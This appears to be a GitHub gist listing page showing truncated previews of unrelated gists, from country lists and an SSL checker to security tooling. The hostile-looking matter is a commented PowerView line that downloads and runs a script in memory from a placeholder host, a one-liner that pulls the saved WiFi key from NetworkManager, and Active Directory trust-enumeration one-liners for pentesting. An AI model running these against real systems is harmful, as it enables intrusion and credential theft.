@incredimike
incredimike / variousCountryListFormats.js
Last active July 5, 2024 05:47
List of Countries in various JavaScript data structures: Alphabetical country lists & Country data objects.
// Lists of countries with ISO 3166 codes, presented in various formats.
// Last Updated: July 30, 2020
// If you're using PHP, I suggest checking out:
// https://github.com/thephpleague/iso3166
// or Laravel: https://github.com/squirephp/squire
//
// JS developers can check out:
// https://www.npmjs.com/package/iso3166-2-db
//
@HarmJ0y
HarmJ0y / PSConfEU.ps1
Last active October 15, 2023 22:37
PSConfEU PowerView demo
# Import PowerView into memory without touching disk
# IEX (New-Object Net.WebClient).DownloadString('http://HOST/powerview.ps1')
###################################
# Hunting for Users
###################################
# search for administrator groups
@jaredcatkinson
jaredcatkinson / Get-InjectedThread.ps1
Last active July 1, 2024 08:32
Code from "Taking Hunting to the Next Level: Hunting in Memory" presentation at SANS Threat Hunting Summit 2017 by Jared Atkinson and Joe Desimone
function Get-InjectedThread
{
<#
.SYNOPSIS
Looks for threads that were created as a result of code injection.
.DESCRIPTION
cd
mkdir work
cd work
git clone https://github.com/zmap/zmap.git
apt-get install build-essential cmake libgmp3-dev gengetopt libpcap-dev flex byacc libjson-c-dev pkg-config libunistring-dev
cd zmap
cmake .
make -j4
make install
cd
@HarmJ0y
HarmJ0y / PowerView-3.0-tricks.ps1
Last active July 5, 2024 15:14
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
@seamustuohy
seamustuohy / get_current_wpa_psk.sh
Created October 22, 2017 19:23
WPA-PSK Bash Golf
# Bash Golf example that gets the WPA-PSK key from the WiFi network you are currently connected to.
# Beyond the basics (cut & grep) it uses network manager's CLI and python3
c='cut -d: -f2';g=grep;a=$(nmcli -t -f ACTIVE,SSID d w l|$g -E "^yes:"|$c);p=$(nmcli -s -t c show $a|$g psk:|$c);python3 -c "from hashlib import pbkdf2_hmac as p; from binascii import hexlify as h;print('PSK',h(p('sha1', b'$p', b'$a', 4096, dklen=32)).decode('ascii'))"
@gdamjan
gdamjan / ssl-check.py
Last active April 14, 2024 07:16
Python script to check on SSL certificates
# -*- encoding: utf-8 -*-
# requires a recent enough python with idna support in socket
# pyopenssl, cryptography and idna
from OpenSSL import SSL
from cryptography import x509
from cryptography.x509.oid import NameOID
import idna
from socket import socket
$reboot
bash: /sbin/reboot: Input/output error
$shutdown -r now
bash: /sbin/shutdown: Input/output error
#
# if the above reboot commands don't work, try either a forced reboot or shutdown
#
@brianreitz
brianreitz / msobjs_message_table.txt
Last active May 29, 2024 10:40
msobjs.dll Message Table by MessageID
%%279 : Undefined Access (no effect) Bit 7
%%1536 : Unused message ID
%%1537 : DELETE
%%1538 : READ_CONTROL
%%1539 : WRITE_DAC
%%1540 : WRITE_OWNER
%%1541 : SYNCHRONIZE
%%1542 : ACCESS_SYS_SEC
%%1543 : MAX_ALLOWED
%%1552 : Unknown specific access (bit 0)
@w00tc
w00tc / 1) Active Directory One Liners
Last active June 22, 2024 08:46
Some Pentesting Notes
Retrieves all of the trust relationships for this domain - Does not Grab Forest Trusts
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
Grab Forest Trusts.
([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).GetAllTrustRelationships()